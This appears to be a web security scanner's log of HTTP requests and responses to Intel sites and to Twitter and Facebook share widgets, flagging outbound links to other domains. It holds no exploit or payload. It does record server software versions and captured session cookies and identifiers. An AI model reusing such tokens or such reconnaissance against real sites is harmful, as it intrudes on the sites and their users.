GET /default.aspx?iid=gg_support-EN_01+home_downloadctr HTTP/1.1 Host: downloadcenter.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:17:39 GMT Server: Microsoft-IIS/6.0 P: S4 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=agsokb3iaxti4o55i3gpx5vd; path=/; HttpOnly Set-Cookie: IntelDownloadCenterLocale=en-US; expires=Sun, 05-Feb-2012 23:17:39 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 22403 Vary: Accept-Encoding
GET /?iid=gg_work+home_edc HTTP/1.1 Host: edc.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: ASP.NET_SessionId=eb5lkr2a0mtj1u45d2vcsvm2; path=/; HttpOnly X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 05 Feb 2011 23:17:23 GMT Connection: close Content-Length: 71062
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /ResourceLibrary?iid=subhdr+itc_library HTTP/1.1 Host: itcenter.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Sat, 05 Feb 2011 23:22:32 GMT Connection: close Content-Length: 69656
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en_US" xml:lang="en_US"> <head><met ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
GET /?iid=gg_play+inside-scoop HTTP/1.1 Host: scoop.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:17:42 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.3.3 X-Pingback: http://scoop.intel.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 48873
GET /en-us/?iid=subhdr+devctr_sw HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /sites/academic_showcase/?iid=subhdr+ptr_academia HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /share?url= HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 403 Forbidden Date: Sat, 05 Feb 2011 23:22:38 GMT Server: hi Status: 403 Forbidden X-Transaction: Sat Feb 05 23:22:38 +0000 2011-2372-4030 Last-Modified: Sat, 05 Feb 2011 23:22:38 GMT Content-Type: text/html; charset=utf-8 Content-Length: 4792 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296948158893760; path=/; expires=Sat, 12-Feb-11 23:22:38 GMT; domain=.twitter.com Set-Cookie: guest_id=129694815891181481; path=/; expires=Mon, 07 Mar 2011 23:22:38 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCMBhIvgtAToHaWQiJWZmMmIxZmVlM2RiMTU4%250AZWUyMGUxNzdjYjAzN2QwNmQyIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--88b4fbe02017eb86e2f543e238abaf0c0d5bd291; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
GET /widgets/fan.php?api_key=4310e5850ea0577ea41506efdb019db0&channel_url=http%3A%2F%2Fnewsroom.intel.com%2Fcommunity%2Fintel_newsroom%2F%3Fiid%3Dftr%2Bpress%26fbc_channel%3D1&id=22707976849&name&width=223&connections=0&stream=true&logobar&css HTTP/1.1 Host: www.connect.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 23:21:13 GMT Content-Length: 9266
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]... </title>
GET /sharer.php?u= HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=acZ6j; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php%3Fu; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php%3Fu; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sat, 05 Feb 2011 23:21:09 GMT Content-Length: 10831
GET /?iid=gg_about+home_intc HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:14:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A05%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:06 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:06 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:06 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]... <meta name="Description" content="The Investor Relations home page website contains information about Intel business for stockholders, potential investors, and financial analysts.">
GET /index.cfm?iid=ftr+invrel HTTP/1.1 Host: www.intc.com Proxy-Connection: keep-alive Referer: http://www.intel.com/p/en_US/business?iid=gg_work-en_US+home_business_portal Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:12:49 GMT Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: NOMOBILE=0;path=/ Set-Cookie: INTC_SESSION=1158415365%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A48%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A48%27%7D%7CB98F31D77EB5BDC04B24EA248F8FA9B0;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:12:49 GMT;path=/ Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7588889;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:12:49 GMT;path=/ Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:12:49 GMT;path=/ Vary: Accept-Encoding Content-Length: 37031
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> ...[SNIP]... <meta name="Description" content="The Investor Relations home page website contains information about Intel business for stockholders, potential investors, and financial analysts.">
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr-JP+invrel
Request
GET /jp/business/index.htm?iid=gg_ja_JP+noscript HTTP/1.1 Host: www.intel.co.jp Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:21:10 GMT Content-Length: 30080 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="ja-jp"> <head> <meta http-equiv=Content-Type content="text/html; charset=utf-8">
The page was loaded from a URL containing a query string:
http://www.intel.com/?en_US_01
The response contains the following links to other domains:
http://www.intc.com/?iid=gg_about+home_intc
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /?en_US_01 HTTP/1.1 Host: www.intel.com Proxy-Connection: keep-alive Referer: http://www.intel.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947547820; s_lv_s=Less%20than%201%20day; cf=1; gpv_p18=cim%3A/index.htm; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Vary: Accept-Encoding Date: Sat, 05 Feb 2011 23:12:02 GMT Connection: close Content-Length: 24825
The response contains the following links to other domains:
http://www.intc.com/
http://www.intc.com/?iid=subhdr+info_relations
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /about/companyinfo/FAQ/index.htm?iid=subhdr+info_faqs HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:40 GMT Content-Length: 32375 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
...[SNIP]... <li class=" gaat40-null" id="gaat40-sbhdr_about_info_col1_3"><a href="http://www.intc.com/?iid=subhdr+info_relations">Investor Relations</a> ...[SNIP]... </a> <a id="LHC-investor-relations-menu" href="http://www.intc.com">Investor Relations</a> ...[SNIP]... <p>The number of Intel employees can be found in our <a href="http://www.intc.com" target="_blank">annual report</a> ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]...
GET /about/companyinfo/capital/index.htm?iid=subhdr+info_captial HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 35618
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
GET /about/companyinfo/diversity/index.htm?iid=subhdr+info_diversity HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:40 GMT Content-Length: 31698 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
GET /about/companyinfo/healthcare/index.htm?iid=subhdr+info_health HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:40 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43225
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
...[SNIP]... <li class=" gaat40-null" id="gaat40-sbhdr_about_info_col1_3"><a href="http://www.intc.com/?iid=subhdr+info_relations">Investor Relations</a> ...[SNIP]... </a> <a id="LHC-investor-relations-menu" href="http://www.intc.com">Investor Relations</a> ...[SNIP]... <p><a href="http://www.intelstartnow.com/?cid=IHC_Home" title="See how innovators are starting now to improve healthcare" target="_blank">See how innovators are starting now to improve healthcare ></a> ...[SNIP]... <p> <a title="Learn more" href="http://www.careinnovations.com/">Learn more ></a> ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a> ...[SNIP]... <br /> <a href="http://www.adobe.com/go/getflashplayer"> <img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" border="0"/> </a> ...[SNIP]...
The response contains the following links to other domains:
http://www.intc.com/
http://www.intc.com/?iid=subhdr+info_relations
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /about/companyinfo/index.htm?iid=gg_about+intel_companyinfo HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:35 GMT Content-Length: 28972 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head>
